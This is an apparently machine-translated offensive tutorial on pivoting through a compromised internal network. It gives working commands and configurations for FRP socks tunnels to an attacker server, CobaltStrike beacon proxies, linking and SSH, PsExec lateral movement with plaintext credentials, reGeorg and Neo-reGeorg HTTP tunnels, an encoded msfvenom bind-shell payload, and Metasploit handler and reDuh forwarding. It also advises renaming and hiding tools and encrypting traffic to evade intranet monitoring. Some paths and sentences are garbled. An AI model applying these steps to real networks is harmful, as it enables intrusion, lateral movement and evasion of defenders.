Title: How to play intranet penetration in actual combat

Preface

When intranet penetration, a WebShell or CobaltStrike, Metasploit will be launched, etc. is just the beginning, and it is more about moving the intranet horizontally, expanding the results, and hitting the core area. However, the prerequisite for post-infiltration is to build an "exclusive channel" to the intranet in order to further attack. However, in actual combat, the use methods are different due to different network environments.

The following is a self-summary of the mind map of "The way of intranet penetration in actual combat":

Target outbound (socks proxy)

This is the network environment that you are most willing to encounter in actual combat. The target machine can access the Internet normally and can directly hang the socks agent or CobaltStrike on the target machine to open up the target's intranet channel.

Frp (socks5) Frp server configuration file:

1 | [common]

2 | bind_port=8080Frp client configuration file:

1 | [common]

2 | server_addr=xx.xx.xx.xx

3 | server_port=8080

4 | #Service ports use common web ports

5 |

6 | [socks5]

7 | type=tcp

8 | remote_port=8088

9 | plugin=socks5

10 | use_encryption=true

11 | use_compression=true

12 | #socks5 password

13 | #plugin_user=SuperMan

14 | #plugin_passwd=XpO2McWe6nj3 The two functions of encryption and compression are added here, which are not enabled by default. According to the author's introduction, the compression algorithm uses snappy.

use_encryption=true Enable encryption [Encrypted transmission of communication content, effectively preventing traffic from being intercepted]

use_compression=true Enable compression [Convey the transmission content to effectively reduce the transmitted network traffic and speed up the traffic forwarding speed, but will consume some additional CPU resources]

use_encryption=true , use_compression=true must be placed under the relevant protocol. After the frp client and configuration files are transmitted to the target machine, the program name and configuration files are modified and placed in the system-related folders to make it hidden.

Comparison of encryption compression This is the FRP client configuration file that does not use encryption and compression functions. The metasploit hangs the socks proxy is used to scan the data packets transmitted by ms17_010, which can clearly identify the specific attack behavior. If the target intranet has security equipment such as "situation awareness" and traffic analysis, it will be monitored, resulting in the loss of permissions.

After using encryption and compression functions, although the attack source address will also be exposed, the transmitted data packets cannot be distinguished, avoiding the security monitoring equipment in the intranet.

CobaltStrike (socks4a) to the Beacon of the controlled target machine to enable the socks agent.

1 | beacon socks 1024 #Port is set according to the actual situation of VPS

View Proxy Pivots in the menu bar, the copy proxy is connected to Metasploit, or directly hang socks4a in related security tools.

will not be available for online machines. This is a link link. As long as the main link (network Beacon) is disconnected, all of them will be disconnected!

SMB Beacon official introduction to SMB Beacon: SMB Beacon uses a named pipe to communicate through the parent Beacon. When two Beacons are linked, the child Beacon gets the task from the parent Beacon and sends it. Because the linked Beacons uses Windows named pipes for communication, this traffic is encapsulated in the SMB protocol, SMB Beacon is relatively hidden.

Create an SMB Listener (host and port can be ignored), pay attention to the Listener selection, and select the host-derived session that can be reached by route in the session.

After successful operation, you can see the character ∞∞, which is the connection state of the derived SMB Beacon.

can be disconnected with link host link or unlink host on the main Beacon.

1 | beacon link 192.168.144.155

2 | beacon unlink 192.168.144.155 Link Listener Creates Listener on the online host.

Export the executable file or dll corresponding to this type of Listener.

Select the Listener you just created.

Upload the paidload just generated to the currently online target machine, and use the PsExec.exe tool here. (CobalStrike itself is not powerful enough) Use the PsExec tool in Beacon to upload the payload to the target machine that does not leave the network, execute it automatically, and go online.

1 | beacon shell C:WINDOWSTempPsExec.exe -accepteula \192.168.144.155,192.168.144.196 -u administrator -p admin@123 -d -c C:WINDOWSTempbeacon.exe

1 | beacon shell netstat -ano |findstr 4444

SSH Login1 | beacon ssh 192.168.144.174:22 root admin

2 | beacon ssh 192.168.144.203:22 root admin Check the network connection status in the Linux target machine, which is actually a connection established with the previously launched Windows host.

The target does not go out of the network (http proxy)

There may be firewalls, network gates, etc. in the target machine network, which only allows http one-way outflow and cannot access the Internet normally. The above socks method is not feasible, and it can only be used to penetrate using http proxy.

reGeorg (socks5)1 | python reGeorgSocksProxy.py -u http://192.168.144.211/tunnel.aspx -l 0.0.0.0 -p 10080

uses metasploit to hang reGeorg socks proxy to scan the data packets transmitted by ms17_010, which can clearly identify attack behavior.

Neo-reGeorg (encrypted)1 | python neoreg.py -k test@123 -l 0.0.0.0 -p 10081 -u http://192.168.144.211/neo-tunnel.aspx

After using Neo-reGeorg, the packet has been transmitted encrypted.

Ice Scorpion (Open socks5) Ice Scorpion's packet transmission is encrypted and also has the socks proxy function, but there is packet loss during the transmission process. Here we also use metasploit to detect the ms17_010 vulnerability, but the result shows that it does not exist. When no proxy detection is set, the actual vulnerability exists.

Although the proxy scanning method of Ice Scorpion is not as accurate as reGeorg, port detection of small threads is feasible, such as auxiliary/scanner/portscan/tcp. Accuracy is more determined by the number of packets in some detection or other way of transmission.

reduh (Single-port Forwarding) When the service version of the target server middleware and other services is low, reGeorg or Ice Scorpion Horse cannot resolve normally, you need to use other http proxy scripts. This is the environment encountered in a practical battle:

Take reduh as an example here. Although only forwarding the specified port (graphical connection operation is not applicable), you can first use msfvenom to generate a forward shell payload, then combine reduh single-port forwarding to launch metasploit, and finally use the socks4a module to open the proxy. Let’s go through the specific process below:

1 | sudo msfvenom --platform windows -p windows/shell_bind_tcp lport=53 -e x86/shikata_ga_nai -i 5 -f exe -o x86shell.exe

2 |

3 | --platform platform Specify the target platform for payload

4 | -e, --encoder encoder Specifies the encoder to use

5 | -i, --iterations count Specifies the number of encoding times of payload Upload the payload to the target server and execute it.

metasploit is the address and port after listening for forwarding.

1 | sudo msfconsole -q

2 | msf5 use exploit/multi/handler

3 | msf5 exploit(multi/handler) set payload windows/shell_bind_tcp

4 | msf5 exploit(multi/handler) set rhost 127.0.0.1

5 | msf5 exploit(multi/handler) set lport 5353

6 | msf5 exploit(multi/handler) run -j After reDuhServer is transmitted to the target machine, use reDuhClient to connect, and then the rebound port is turned locally.

1 | java -jar reDuhClient.jar http://103.242.xx.xx/reduh.aspx

2 |

3 | telnet 127.0.0.1 1010

4 | [createTunnel]5353:127.0.0.1:53 can penetrate in metasploit, or turn on a socks4a and mount other security tools to continue penetration.

1 | msf5 exploit(multi/handler) use auxiliary/server/socks4a

2 | msf5 auxiliary(server/socks4a) set srvport 10080

3 | msf5 auxiliary(server/socks4a) run -j Note why payload requires shell instead of meterpreter. Meterpreter is a high-level payload that occupies a large number of data packets during transmission. This single-port forwarding is not very stable at all. Meterpreter will make the "small water pipe" more unstable!

Isolated Network (Multi-level Agent)

During intranet penetration, an isolated network will be encountered, which is more logically isolated. The breakthrough method is to obtain the permissions of the route-accessible springboard machine (multiple network cards, operation and maintenance machines, etc.) and establish a first-level second-level agent and a third-level agent.

FRP has now obtained the permissions of a dual network card intranet server, and can use FRP to establish channels. This server is both a server and a client.

After the proxifier is established with FRP, add two proxyings in combination with the proxifier: external network socks and intranet socks, and then create a proxy chain. (Note the proxy order)

Set proxy rules and select the corresponding proxy.

The second layer agent was successful, and the intranet isolation machine 445 detection was opened.

Proxychains command line proxy artifact proxychains, sets the second-layer proxy and socks password. (Note the proxy order)